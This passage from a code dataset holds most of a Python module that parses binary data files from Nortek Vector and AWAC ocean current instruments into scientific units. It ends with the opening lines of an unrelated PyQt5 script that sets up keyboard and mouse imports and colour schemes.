Exception(err_msg)\n if self.config['hdw']['serial_number'][0:3].upper() == 'WPR':\n self.config['config_type'] = 'AWAC'\n elif self.config['hdw']['serial_number'][0:3].upper() == 'VEC':\n self.config['config_type'] = 'ADV'\n # Initialize the instrument type:\n self._inst = self.config.pop('config_type')\n # This is the position after reading the 'hardware',\n # 'head', and 'user' configuration.\n pnow = self.pos\n\n # Run the appropriate initialization routine (e.g. init_ADV).\n getattr(self, 'init_' + self._inst)()\n self.f.close() # This has a small buffer, so close it.\n # This has a large buffer...\n self.f = open(_abspath(fname), 'rb', bufsize)\n self.close = self.f.close\n if self._npings is not None:\n self.n_samp_guess = self._npings\n self.f.seek(pnow, 0) # Seek to the previous position.\n\n da = self.data['attrs']\n if self.config['n_burst'] > 0:\n fs = round(self.config['fs'], 7)\n da['duty_cycle_n_burst'] = self.config['n_burst']\n da['duty_cycle_interval'] = self.config['burst_interval']\n if fs > 1:\n burst_seconds = self.config['n_burst']/fs\n else:\n burst_seconds = round(1/fs, 3)\n da['duty_cycle_description'] = \"{} second bursts collected at {} Hz, with bursts taken every {} minutes\".format(\n burst_seconds, fs, self.config['burst_interval']/60)\n self.burst_start = np.zeros(self.n_samp_guess, dtype='bool')\n da['fs'] = self.config['fs']\n da['coord_sys'] = {'XYZ': 'inst',\n 'ENU': 'earth',\n 'beam': 'beam'}[self.config['coord_sys_axes']]\n da['has_imu'] = 0 # Initiate attribute\n if self.debug:\n logging.info('Init completed')\n\n @property\n def filesize(self,):\n if not hasattr(self, '_filesz'):\n pos = self.pos\n self.f.seek(0, 2)\n # Seek to the end of the file to determine the filesize.\n self._filesz = self.pos\n self.f.seek(pos, 0) # Return to the initial position.\n return self._filesz\n\n @property\n def pos(self,):\n return self.f.tell()\n\n def init_ADV(self,):\n dat = self.data = {'data_vars': {}, 'coords': {}, 'attrs': {},\n 'units': {}, 'long_name': {}, 'standard_name': {},\n 'sys': {}}\n da = dat['attrs']\n dv = dat['data_vars']\n da['inst_make'] = 'Nortek'\n da['inst_model'] = 'Vector'\n da['inst_type'] = 'ADV'\n da['rotate_vars'] = ['vel']\n dv['beam2inst_orientmat'] = self.config.pop('beam2inst_orientmat')\n self.config['fs'] = 512 / self.config['awac']['avg_interval']\n da.update(self.config['usr'])\n da.update(self.config['adv'])\n da.update(self.config['head'])\n da.update(self.config['hdw'])\n\n # No apparent way to determine how many samples are in a file\n dlta = self.code_spacing('0x11')\n self.n_samp_guess = int(self.filesize / dlta + 1)\n self.n_samp_guess *= int(self.config['fs'])\n\n def init_AWAC(self,):\n dat = self.data = {'data_vars': {}, 'coords': {}, 'attrs': {},\n 'units': {}, 'long_name': {}, 'standard_name': {},\n 'sys': {}}\n da = dat['attrs']\n dv = dat['data_vars']\n da['inst_make'] = 'Nortek'\n da['inst_model'] = 'AWAC'\n da['inst_type'] = 'ADCP'\n dv['beam2inst_orientmat'] = self.config.pop('beam2inst_orientmat')\n da['rotate_vars'] = ['vel']\n self.config['fs'] = 1. / self.config['awac']['avg_interval']\n da.update(self.config['usr'])\n da.update(self.config['awac'])\n da.update(self.config['head'])\n da.update(self.config['hdw'])\n\n space = self.code_spacing('0x20')\n if space == 0:\n # code spacing is zero if there's only 1 profile\n self.n_samp_guess = 1\n else:\n self.n_samp_guess = int(self.filesize / space + 1)\n\n def read(self, nbyte):\n byts = self.f.read(nbyte)\n if not (len(byts) == nbyte):\n raise EOFError('Reached the end of the file')\n return byts\n\n def findnext(self, do_cs=True):\n \"\"\"Find the next data block by checking the checksum and the\n sync byte(0xa5)\n \"\"\"\n sum = np.uint16(int('0xb58c', 0)) # Initialize the sum\n cs = 0\n func = _bitshift8\n func2 = np.uint8\n if self.endian == '<':\n func = np.uint8\n func2 = _bitshift8\n while True:\n val = unpack(self.endian + 'H', self.read(2))[0]\n if func(val) == 165 and (not do_cs or cs == np.uint16(sum)):\n self.f.seek(-2, 1)\n return hex(func2(val))\n sum += cs\n cs = val\n\n def read_id(self,):\n \"\"\"Read the next 'ID' from the file.\n \"\"\"\n self._thisid_bytes = bts = self.read(2)\n tmp = unpack(self.endian + 'BB', bts)\n if self.debug:\n logging.info('Position: {}, codes: {}'.format(self.f.tell(), tmp))\n if tmp[0] != 165: # This catches a corrupted data block.\n if self.debug:\n logging.warning(\"Corrupted data block sync code (%d, %d) found \"\n \"in ping %d. Searching for next valid code...\" %\n (tmp[0], tmp[1], self.c))\n val = int(self.findnext(do_cs=False), 0)\n self.f.seek(2, 1)\n if self.debug:\n logging.debug(\n ' ...FOUND {} at position: {}.'.format(val, self.pos))\n return val\n return tmp[1]\n\n def readnext(self,):\n id = '0x%02x' % self.read_id()\n if id in self.fun_map:\n func_name = self.fun_map[id]\n out = getattr(self, func_name)() # Should return None\n self._lastread = [func_name[5:]] + self._lastread[:-1]\n return out\n else:\n logging.warning('Unrecognized identifier: ' + id)\n self.f.seek(-2, 1)\n return 10\n\n def readfile(self, nlines=None):\n print('Reading file %s ...' % self.fname)\n retval = None\n try:\n while not retval:\n if self.c == nlines:\n break\n retval = self.readnext()\n if retval == 10:\n self.findnext()\n retval = None\n if self._npings is not None and self.c >= self._npings:\n if 'microstrain' in self._dtypes:\n try:\n self.readnext()\n except:\n pass\n break\n except EOFError:\n if self.debug:\n logging.info(' end of file at {} bytes.'.format(self.pos))\n else:\n if self.debug:\n logging.info(' stopped at {} bytes.'.format(self.pos))\n self.c -= 1\n _crop_data(self.data, slice(0, self.c), self.n_samp_guess)\n\n def findnextid(self, id):\n if id.__class__ is str:\n id = int(id, 0)\n nowid = None\n while nowid != id:\n nowid = self.read_id()\n if nowid == 16:\n shift = 22\n else:\n sz = 2 * unpack(self.endian + 'H', self.read(2))[0]\n shift = sz - 4\n self.f.seek(shift, 1)\n return self.pos\n\n def code_spacing(self, searchcode, iternum=50):\n \"\"\"Find the spacing, in bytes, between a specific hardware code.\n Repeat this * iternum * times(default 50).\n Returns the average spacing, in bytes, between the code.\n \"\"\"\n p0 = self.findnextid(searchcode)\n for i in range(iternum):\n try:\n self.findnextid(searchcode)\n except EOFError:\n break\n if self.debug:\n logging.info('p0={}, pos={}, i={}'.format(p0, self.pos, i))\n # Compute the average of the data size:\n return (self.pos - p0) / (i + 1)\n\n def checksum(self, byts):\n \"\"\"Perform a checksum on `byts` and read the checksum value.\n \"\"\"\n if self.do_checksum:\n if not np.sum(unpack(self.endian + str(int(1 + len(byts) / 2)) + 'H',\n self._thisid_bytes + byts)) + \\\n 46476 - unpack(self.endian + 'H', self.read(2)):\n\n raise Exception(\"CheckSum Failed at {}\".format(self.pos))\n else:\n self.f.seek(2, 1)\n\n def read_user_cfg(self,):\n # ID: '0x00 = 00\n if self.debug:\n logging.info('Reading user configuration (0x00) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg_u = self.config\n byts = self.read(508)\n # the first two bytes are the size.\n tmp = unpack(self.endian +\n '2x18H6s4HI9H90H80s48xH50x6H4xH2x2H2xH30x8H',\n byts)\n cfg_u['usr'] = {}\n cfg_u['adv'] = {}\n cfg_u['awac'] = {}\n\n cfg_u['transmit_pulse_length_m'] = tmp[0] # counts\n cfg_u['blank_dist'] = tmp[1] # overridden below\n cfg_u['receive_length_m'] = tmp[2] # counts\n cfg_u['time_between_pings'] = tmp[3] # counts\n cfg_u['time_between_bursts'] = tmp[4] # counts\n cfg_u['adv']['n_pings_per_burst'] = tmp[5]\n cfg_u['awac']['avg_interval'] = tmp[6]\n cfg_u['usr']['n_beams'] = tmp[7]\n TimCtrlReg = _int2binarray(tmp[8], 16).astype(int)\n # From the nortek system integrator manual\n # (note: bit numbering is zero-based)\n cfg_u['usr']['profile_mode'] = [\n 'single', 'continuous'][TimCtrlReg[1]]\n cfg_u['usr']['burst_mode'] = str(bool(~TimCtrlReg[2]))\n cfg_u['usr']['power_level'] = TimCtrlReg[5] + 2 * TimCtrlReg[6] + 1\n cfg_u['usr']['sync_out_pos'] = ['middle', 'end', ][TimCtrlReg[7]]\n cfg_u['usr']['sample_on_sync'] = str(bool(TimCtrlReg[8]))\n cfg_u['usr']['start_on_sync'] = str(bool(TimCtrlReg[9]))\n cfg_u['PwrCtrlReg'] = _int2binarray(tmp[9], 16)\n cfg_u['A1'] = tmp[10]\n cfg_u['B0'] = tmp[11]\n cfg_u['B1'] = tmp[12]\n cfg_u['usr']['compass_update_rate'] = tmp[13]\n cfg_u['coord_sys_axes'] = ['ENU', 'XYZ', 'beam'][tmp[14]]\n cfg_u['usr']['n_bins'] = tmp[15]\n cfg_u['bin_length'] = tmp[16]\n cfg_u['burst_interval'] = tmp[17]\n cfg_u['usr']['deployment_name'] = tmp[18].partition(b'\\x00')[\n 0].decode('utf-8')\n cfg_u['usr']['wrap_mode'] = str(bool(tmp[19]))\n cfg_u['deployment_time'] = np.array(tmp[20:23])\n cfg_u['diagnotics_interval'] = tmp[23]\n Mode0 = _int2binarray(tmp[24], 16)\n cfg_u['user_soundspeed_adj_factor'] = tmp[25]\n cfg_u['n_samples_diag'] = tmp[26]\n cfg_u['n_beams_cells_diag'] = tmp[27]\n cfg_u['n_pings_diag_wave'] = tmp[28]\n ModeTest = _int2binarray(tmp[29], 16)\n cfg_u['usr']['analog_in'] = tmp[30]\n sfw_ver = str(tmp[31])\n cfg_u['usr']['software_version'] = sfw_ver[0] + \\\n '.'+sfw_ver[1:3]+'.'+sfw_ver[3:]\n cfg_u['usr']['salinity'] = tmp[32]/10\n cfg_u['VelAdjTable'] = np.array(tmp[33:123])\n cfg_u['usr']['comments'] = tmp[123].partition(b'\\x00')[\n 0].decode('utf-8')\n cfg_u['awac']['wave_processing_method'] = [\n 'PUV', 'SUV', 'MLM', 'MLMST', 'None'][tmp[124]]\n Mode1 = _int2binarray(tmp[125], 16)\n cfg_u['awac']['prc_dyn_wave_cell_pos'] = int(tmp[126]/32767 * 100)\n cfg_u['wave_transmit_pulse'] = tmp[127]\n cfg_u['wave_blank_dist'] = tmp[128]\n cfg_u['awac']['wave_cell_size'] = tmp[129]\n cfg_u['awac']['n_samples_wave'] = tmp[130]\n cfg_u['n_burst'] = tmp[131]\n cfg_u['analog_out_scale'] = tmp[132]\n cfg_u['corr_thresh'] = tmp[133]\n cfg_u['transmit_pulse_lag2'] = tmp[134] # counts\n cfg_u['QualConst'] = np.array(tmp[135:143])\n self.checksum(byts)\n cfg_u['usr']['user_specified_sound_speed'] = str(Mode0[0])\n cfg_u['awac']['wave_mode'] = ['Disabled', 'Enabled'][int(Mode0[1])]\n cfg_u['usr']['analog_output'] = str(Mode0[2])\n cfg_u['usr']['output_format'] = ['Vector', 'ADV'][int(Mode0[3])] # noqa\n cfg_u['vel_scale_mm'] = [1, 0.1][int(Mode0[4])]\n cfg_u['usr']['serial_output'] = str(Mode0[5])\n cfg_u['reserved_EasyQ'] = str(Mode0[6])\n cfg_u['usr']['power_output_analog'] = str(Mode0[8])\n cfg_u['mode_test_use_DSP'] = str(ModeTest[0])\n cfg_u['mode_test_filter_output'] = ['total', 'correction_only'][int(ModeTest[1])] # noqa\n cfg_u['awac']['wave_fs'] = ['1 Hz', '2 Hz'][int(Mode1[0])]\n cfg_u['awac']['wave_cell_position'] = ['fixed', 'dynamic'][int(Mode1[1])] # noqa\n cfg_u['awac']['type_wave_cell_pos'] = ['pct_of_mean_pressure', 'pct_of_min_re'][int(Mode1[2])] # noqa\n\n def read_head_cfg(self,):\n # ID: '0x04 = 04\n if self.debug:\n logging.info('Reading head configuration (0x04) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg = self.config\n cfg['head'] = {}\n byts = self.read(220)\n tmp = unpack(self.endian + '2x3H12s176s22sH', byts)\n head_config = _int2binarray(tmp[0], 16).astype(int)\n cfg['head']['pressure_sensor'] = ['no', 'yes'][head_config[0]]\n cfg['head']['compass'] = ['no', 'yes'][head_config[1]]\n cfg['head']['tilt_sensor'] = ['no', 'yes'][head_config[2]]\n cfg['head']['carrier_freq_kHz'] = tmp[1]\n cfg['beam2inst_orientmat'] = np.array(\n unpack(self.endian + '9h', tmp[4][8:26])).reshape(3, 3) / 4096.\n self.checksum(byts)\n\n def read_hw_cfg(self,):\n # ID 0x05 = 05\n if self.debug:\n logging.info('Reading hardware configuration (0x05) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg_hw = self.config\n cfg_hw['hdw'] = {}\n byts = self.read(44)\n tmp = unpack(self.endian + '2x14s6H12x4s', byts)\n cfg_hw['hdw']['serial_number'] = tmp[0][:8].decode('utf-8')\n cfg_hw['ProLogID'] = unpack('B', tmp[0][8:9])[0]\n cfg_hw['hdw']['ProLogFWver'] = tmp[0][10:].decode('utf-8')\n cfg_hw['board_config'] = tmp[1]\n cfg_hw['board_freq'] = tmp[2]\n cfg_hw['hdw']['PIC_version'] = tmp[3]\n cfg_hw['hdw']['hardware_rev'] = tmp[4]\n cfg_hw['hdw']['recorder_size_bytes'] = tmp[5] * 65536\n status = _int2binarray(tmp[6], 16).astype(int)\n cfg_hw['hdw']['vel_range'] = ['normal', 'high'][status[0]]\n cfg_hw['hdw']['firmware_version'] = tmp[7].decode('utf-8')\n self.checksum(byts)\n\n def rd_time(self, strng):\n \"\"\"Read the time from the first 6bytes of the input string.\n \"\"\"\n min, sec, day, hour, year, month = unpack('BBBBBB', strng[:6])\n return time.date2epoch(datetime(time._fullyear(_bcd2char(year)),\n _bcd2char(month),\n _bcd2char(day),\n _bcd2char(hour),\n _bcd2char(min),\n _bcd2char(sec)))[0]\n\n def _init_data(self, vardict):\n \"\"\"Initialize the data object according to vardict.\n\n Parameters\n ----------\n vardict : (dict of :class:``)\n The variable definitions in the :class:`` specify\n how to initialize each data variable.\n \"\"\"\n\n shape_args = {'n': self.n_samp_guess}\n try:\n shape_args['nbins'] = self.config['usr']['n_bins']\n except KeyError:\n pass\n for nm, va in list(vardict.items()):\n if va.group is None:\n # These have to stay separated.\n if nm not in self.data:\n self.data[nm] = va._empty_array(**shape_args)\n else:\n if nm not in self.data[va.group]:\n self.data[va.group][nm] = va._empty_array(**shape_args)\n self.data['units'][nm] = va.units\n self.data['long_name'][nm] = va.long_name\n self.data['standard_name'][nm] = va.standard_name\n\n def read_vec_data(self,):\n # ID: 0x10 = 16\n c = self.c\n dat = self.data\n if self.debug:\n logging.info('Reading vector velocity data (0x10) ping #{} @ {}...'\n .format(self.c, self.pos))\n\n if 'vel' not in dat['data_vars']:\n self._init_data(nortek_defs.vec_data)\n self._dtypes += ['vec_data']\n\n byts = self.read(20)\n ds = dat['sys']\n dv = dat['data_vars']\n (ds['AnaIn2LSB'][c],\n ds['Count'][c],\n dv['PressureMSB'][c],\n ds['AnaIn2MSB'][c],\n dv['PressureLSW'][c],\n ds['AnaIn1'][c],\n dv['vel'][0, c],\n dv['vel'][1, c],\n dv['vel'][2, c],\n dv['amp'][0, c],\n dv['amp'][1, c],\n dv['amp'][2, c],\n dv['corr'][0, c],\n dv['corr'][1, c],\n dv['corr'][2, c]) = unpack(self.endian + '4B2H3h6B', byts)\n\n self.checksum(byts)\n self.c += 1\n\n def read_vec_checkdata(self,):\n # ID: 0x07 = 07\n if self.debug:\n logging.info('Reading vector check data (0x07) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts0 = self.read(6)\n checknow = {}\n tmp = unpack(self.endian + '2x2H', byts0) # The first two are size.\n checknow['Samples'] = tmp[0]\n n = checknow['Samples']\n checknow['First_samp'] = tmp[1]\n checknow['Amp1'] = tbx._nans(n, dtype=np.uint8) + 8\n checknow['Amp2'] = tbx._nans(n, dtype=np.uint8) + 8\n checknow['Amp3'] = tbx._nans(n, dtype=np.uint8) + 8\n byts1 = self.read(3 * n)\n tmp = unpack(self.endian + (3 * n * 'B'), byts1)\n for idx, nm in enumerate(['Amp1', 'Amp2', 'Amp3']):\n checknow[nm] = np.array(tmp[idx * n:(idx + 1) * n], dtype=np.uint8)\n self.checksum(byts0 + byts1)\n if 'checkdata' not in self.config:\n self.config['checkdata'] = checknow\n else:\n if not isinstance(self.config['checkdata'], list):\n self.config['checkdata'] = [self.config['checkdata']]\n self.config['checkdata'] += [checknow]\n\n def _sci_data(self, vardict):\n \"\"\"Convert the data to scientific units accordint to vardict.\n\n Parameters\n ----------\n vardict : (dict of :class:``)\n The variable definitions in the :class:`` specify\n how to scale each data variable.\n\n \"\"\"\n for nm, vd in list(vardict.items()):\n if vd.group is None:\n dat = self.data\n else:\n dat = self.data[vd.group]\n retval = vd.sci_func(dat[nm])\n # This checks whether a new data object was created:\n # sci_func returns None if it modifies the existing data.\n if retval is not None:\n dat[nm] = retval\n\n def sci_vec_data(self,):\n self._sci_data(nortek_defs.vec_data)\n dat = self.data\n\n dat['data_vars']['pressure'] = (\n dat['data_vars']['PressureMSB'].astype('float32') * 65536 +\n dat['data_vars']['PressureLSW'].astype('float32')) / 1000.\n dat['units']['pressure'] = 'dbar'\n dat['long_name']['pressure'] = 'Pressure'\n dat['standard_name']['pressure'] = 'sea_water_pressure'\n\n dat['data_vars'].pop('PressureMSB')\n dat['data_vars'].pop('PressureLSW')\n\n # Apply velocity scaling (1 or 0.1)\n dat['data_vars']['vel'] *= self.config['vel_scale_mm']\n\n def read_vec_hdr(self,):\n # ID: '0x12 = 18\n if self.debug:\n logging.info('Reading vector header data (0x12) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts = self.read(38)\n # The first two are size, the next 6 are time.\n tmp = unpack(self.endian + '8xH7B21x', byts)\n hdrnow = {}\n hdrnow['time'] = self.rd_time(byts[2:8])\n hdrnow['NRecords'] = tmp[0]\n hdrnow['Noise1'] = tmp[1]\n hdrnow['Noise2'] = tmp[2]\n hdrnow['Noise3'] = tmp[3]\n hdrnow['Spare0'] = byts[13:14].decode('utf-8')\n hdrnow['Corr1'] = tmp[5]\n hdrnow['Corr2'] = tmp[6]\n hdrnow['Corr3'] = tmp[7]\n hdrnow['Spare1'] = byts[17:].decode('utf-8')\n self.checksum(byts)\n if 'data_header' not in self.config:\n self.config['data_header'] = hdrnow\n else:\n if not isinstance(self.config['data_header'], list):\n self.config['data_header'] = [self.config['data_header']]\n self.config['data_header'] += [hdrnow]\n\n def read_vec_sysdata(self,):\n # ID: 0x11 = 17\n c = self.c\n if self.debug:\n logging.info('Reading vector system data (0x11) ping #{} @ {}...'\n .format(self.c, self.pos))\n dat = self.data\n if self._lastread[:2] == ['vec_checkdata', 'vec_hdr', ]:\n self.burst_start[c] = True\n if 'time' not in dat['coords']:\n self._init_data(nortek_defs.vec_sysdata)\n self._dtypes += ['vec_sysdata']\n byts = self.read(24)\n # The first two are size (skip them).\n dat['coords']['time'][c] = self.rd_time(byts[2:8])\n ds = dat['sys']\n dv = dat['data_vars']\n (dv['batt'][c],\n dv['c_sound'][c],\n dv['heading'][c],\n dv['pitch'][c],\n dv['roll'][c],\n dv['temp'][c],\n dv['error'][c],\n dv['status'][c],\n ds['AnaIn'][c]) = unpack(self.endian + '2H3hH2BH', byts[8:])\n self.checksum(byts)\n\n def sci_vec_sysdata(self,):\n \"\"\"Translate the data in the vec_sysdata structure into\n scientific units.\n \"\"\"\n dat = self.data\n fs = dat['attrs']['fs']\n self._sci_data(nortek_defs.vec_sysdata)\n t = dat['coords']['time']\n dv = dat['data_vars']\n dat['sys']['_sysi'] = ~np.isnan(t)\n # These are the indices in the sysdata variables\n # that are not interpolated.\n nburst = self.config['n_burst']\n dv['orientation_down'] = tbx._nans(len(t), dtype='bool')\n if nburst == 0:\n num_bursts = 1\n nburst = len(t)\n else:\n num_bursts = int(len(t) // nburst + 1)\n for nb in range(num_bursts):\n iburst = slice(nb * nburst, (nb + 1) * nburst)\n sysi = dat['sys']['_sysi'][iburst]\n if len(sysi) == 0:\n break\n # Skip the first entry for the interpolation process\n inds = np.nonzero(sysi)[0][1:]\n arng = np.arange(len(t[iburst]), dtype=np.float64)\n if len(inds) >= 2:\n p = np.poly1d(np.polyfit(inds, t[iburst][inds], 1))\n t[iburst] = p(arng)\n elif len(inds) == 1:\n t[iburst] = ((arng - inds[0]) / (fs * 3600 * 24) +\n t[iburst][inds[0]])\n else:\n t[iburst] = (t[iburst][0] + arng / (fs * 24 * 3600))\n\n tmpd = tbx._nans_like(dv['heading'][iburst])\n # The first status bit should be the orientation.\n tmpd[sysi] = dv['status'][iburst][sysi] & 1\n tbx.fillgaps(tmpd, extrapFlg=True)\n tmpd = np.nan_to_num(tmpd, nan=0) # nans in pitch roll heading\n slope = np.diff(tmpd)\n tmpd[1:][slope < 0] = 1\n tmpd[:-1][slope > 0] = 0\n dv['orientation_down'][iburst] = tmpd.astype('bool')\n tbx.interpgaps(dv['batt'], t)\n tbx.interpgaps(dv['c_sound'], t)\n tbx.interpgaps(dv['heading'], t)\n tbx.interpgaps(dv['pitch'], t)\n tbx.interpgaps(dv['roll'], t)\n tbx.interpgaps(dv['temp'], t)\n\n def read_microstrain(self,):\n \"\"\"Read ADV microstrain sensor (IMU) data\n \"\"\"\n def update_defs(dat, mag=False, orientmat=False):\n imu_data = {'accel': ['m s-2', 'Acceleration', 'platform_acceleration'],\n 'angrt': ['rad s-1', 'Angular Velocity', 'platform_angular_velocity'],\n 'mag': ['gauss', 'Compass', 'magnetic_field_vector'],\n 'orientmat': ['1', 'Orientation Matrix', '']}\n for ky in imu_data:\n dat['units'].update({ky: imu_data[ky][0]})\n dat['long_name'].update({ky: imu_data[ky][1]})\n dat['standard_name'].update({ky: imu_data[ky][2]})\n if not mag:\n dat['units'].pop('mag')\n dat['long_name'].pop('mag')\n dat['standard_name'].pop('mag')\n if not orientmat:\n dat['units'].pop('orientmat')\n dat['long_name'].pop('orientmat')\n dat['standard_name'].pop('orientmat')\n\n # 0x71 = 113\n if self.c == 0:\n logging.warning('First \"microstrain data\" block '\n 'is before first \"vector system data\" block.')\n else:\n self.c -= 1\n if self.debug:\n logging.info('Reading vector microstrain data (0x71) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts0 = self.read(4)\n # The first 2 are the size, 3rd is count, 4th is the id.\n ahrsid = unpack(self.endian + '3xB', byts0)[0]\n if hasattr(self, '_ahrsid') and self._ahrsid != ahrsid:\n logging.warning('AHRS_ID changes mid-file!')\n\n if ahrsid in [195, 204, 210, 211]:\n self._ahrsid = ahrsid\n\n c = self.c\n dat = self.data\n dv = dat['data_vars']\n da = dat['attrs']\n da['has_imu'] = 1 # logical\n if 'accel' not in dv:\n self._dtypes += ['microstrain']\n if ahrsid == 195:\n self._orient_dnames = ['accel', 'angrt', 'orientmat']\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['orientmat'] = tbx._nans((3, 3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['accel', 'angrt']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n update_defs(dat, mag=False, orientmat=True)\n\n if ahrsid in [204, 210]:\n self._orient_dnames = ['accel', 'angrt', 'mag', 'orientmat']\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['mag'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['accel', 'angrt', 'mag']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n if ahrsid == 204:\n dv['orientmat'] = tbx._nans((3, 3, self.n_samp_guess),\n dtype=np.float32)\n update_defs(dat, mag=True, orientmat=True)\n\n if ahrsid == 211:\n self._orient_dnames = ['angrt', 'accel', 'mag']\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['mag'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['angrt', 'accel', 'mag']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n update_defs(dat, mag=True, orientmat=False)\n\n byts = ''\n if ahrsid == 195: # 0xc3\n byts = self.read(64)\n dt = unpack(self.endian + '6f9f4x', byts)\n (dv['angrt'][:, c],\n dv['accel'][:, c]) = (dt[0:3], dt[3:6],)\n dv['orientmat'][:, :, c] = ((dt[6:9], dt[9:12], dt[12:15]))\n elif ahrsid == 204: # 0xcc\n byts = self.read(78)\n # This skips the \"DWORD\" (4 bytes) and the AHRS checksum\n # (2 bytes)\n dt = unpack(self.endian + '18f6x', byts)\n (dv['accel'][:, c],\n dv['angrt'][:, c],\n dv['mag'][:, c]) = (dt[0:3], dt[3:6], dt[6:9],)\n dv['orientmat'][:, :, c] = ((dt[9:12], dt[12:15], dt[15:18]))\n elif ahrsid == 211:\n byts = self.read(42)\n dt = unpack(self.endian + '9f6x', byts)\n (dv['angrt'][:, c],\n dv['accel'][:, c],\n dv['mag'][:, c]) = (dt[0:3], dt[3:6], dt[6:9],)\n else:\n logging.warning('Unrecognized IMU identifier: ' + str(ahrsid))\n self.f.seek(-2, 1)\n return 10\n self.checksum(byts0 + byts)\n self.c += 1 # reset the increment\n\n def sci_microstrain(self,):\n \"\"\"Rotate orientation data into ADV coordinate system.\n \"\"\"\n # MS = MicroStrain\n dv = self.data['data_vars']\n for nm in self._orient_dnames:\n # Rotate the MS orientation data (in MS coordinate system)\n # to be consistent with the ADV coordinate system.\n # (x,y,-z)_ms = (z,y,x)_adv\n (dv[nm][2],\n dv[nm][0]) = (dv[nm][0],\n -dv[nm][2].copy())\n if 'orientmat' in self._orient_dnames:\n # MS coordinate system is in North-East-Down (NED),\n # we want East-North-Up (ENU)\n dv['orientmat'][:, 2] *= -1\n (dv['orientmat'][:, 0],\n dv['orientmat'][:, 1]) = (dv['orientmat'][:, 1],\n dv['orientmat'][:, 0].copy())\n if 'accel' in dv:\n # This value comes from the MS 3DM-GX3 MIP manual\n dv['accel'] *= 9.80665\n if self._ahrsid in [195, 211]:\n # These are DAng and DVel, so we convert them to angrt, accel here\n dv['angrt'] *= self.config['fs']\n dv['accel'] *= self.config['fs']\n\n def read_awac_profile(self,):\n # ID: '0x20' = 32\n dat = self.data\n if self.debug:\n logging.info('Reading AWAC velocity data (0x20) ping #{} @ {}...'\n .format(self.c, self.pos))\n nbins = self.config['usr']['n_bins']\n if 'temp' not in dat['data_vars']:\n self._init_data(nortek_defs.awac_profile)\n self._dtypes += ['awac_profile']\n\n # Note: docs state there is 'fill' byte at the end, if nbins is odd,\n # but doesn't appear to be the case\n n = self.config['usr']['n_beams']\n byts = self.read(116 + n*3 * nbins)\n c = self.c\n dat['coords']['time'][c] = self.rd_time(byts[2:8])\n ds = dat['sys']\n dv = dat['data_vars']\n (dv['error'][c],\n ds['AnaIn1'][c],\n dv['batt'][c],\n dv['c_sound'][c],\n dv['heading'][c],\n dv['pitch'][c],\n dv['roll'][c],\n p_msb,\n dv['status'][c],\n p_lsw,\n dv['temp'][c],) = unpack(self.endian + '7HBB2H', byts[8:28])\n dv['pressure'][c] = (65536 * p_msb + p_lsw)\n # The nortek system integrator manual specifies an 88byte 'spare'\n # field, therefore we start at 116.\n tmp = unpack(self.endian + str(n * nbins) + 'h' +\n str(n * nbins) + 'B', byts[116:116 + n*3 * nbins])\n for idx in range(n):\n dv['vel'][idx, :, c] = tmp[idx * nbins: (idx + 1) * nbins]\n dv['amp'][idx, :, c] = tmp[(idx + n) * nbins: (idx + n+1) * nbins]\n self.checksum(byts)\n self.c += 1\n\n def sci_awac_profile(self,):\n self._sci_data(nortek_defs.awac_profile)\n # Calculate the ranges.\n cs_coefs = {2000: 0.0239,\n 1000: 0.0478,\n 600: 0.0797,\n 400: 0.1195}\n h_ang = 25 * (np.pi / 180) # Head angle is 25 degrees for all awacs.\n # Cell size\n cs = round(float(self.config['bin_length']) / 256. *\n cs_coefs[self.config['head']['carrier_freq_kHz']] * np.cos(h_ang), ndigits=2)\n # Blanking distance\n bd = round(self.config['blank_dist'] *\n 0.0229 * np.cos(h_ang) - cs, ndigits=2)\n\n r = (np.float32(np.arange(self.config['usr']['n_bins']))+1)*cs + bd\n self.data['coords']['range'] = r\n self.data['attrs']['cell_size'] = cs\n self.data['attrs']['blank_dist'] = bd\n\n def dat2sci(self,):\n for nm in self._dtypes:\n getattr(self, 'sci_' + nm)()\n for nm in ['data_header', 'checkdata']:\n if nm in self.config and isinstance(self.config[nm], list):\n self.config[nm] = _recatenate(self.config[nm])\n\n def __exit__(self, type, value, trace):\n self.close()\n\n def __enter__(self):\n return self\n\n\ndef _crop_data(obj, range, n_lastdim):\n for nm, dat in obj.items():\n if isinstance(dat, np.ndarray) and (dat.shape[-1] == n_lastdim):\n obj[nm] = dat[..., range]\n\n\ndef _recatenate(obj):\n out = type(obj[0])()\n for ky in list(obj[0].keys()):\n if ky in ['__data_groups__', '_type']:\n continue\n val0 = obj[0][ky]\n if isinstance(val0, np.ndarray) and val0.size > 1:\n out[ky] = np.concatenate([val[ky][..., None] for val in obj],\n axis=-1)\n else:\n out[ky] = np.array([val[ky] for val in obj])\n return out\n","repo_name":"lkilcher/dolfyn","sub_path":"dolfyn/io/nortek.py","file_name":"nortek.py","file_ext":"py","file_size_in_byte":41729,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"32"} +{"seq_id":"26382399048","text":"#!/usr/bin/env python3\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import QPalette, QColor, QFont\nfrom PyQt5.QtWidgets import *\nimport keyboard, mouse\n\n# ---- ColorSchemes\n# Human Readable ColorSchemes\n# scheme_name = [background, foreground]\nzi_dark = [\"2F3640\", \"ffffff\"] # normal\nzi_darkP = [\"37B0FF\", \"ffffff\"] # pressed\n\n# Readable Color by the codes\ncolorscheme = str(\"* 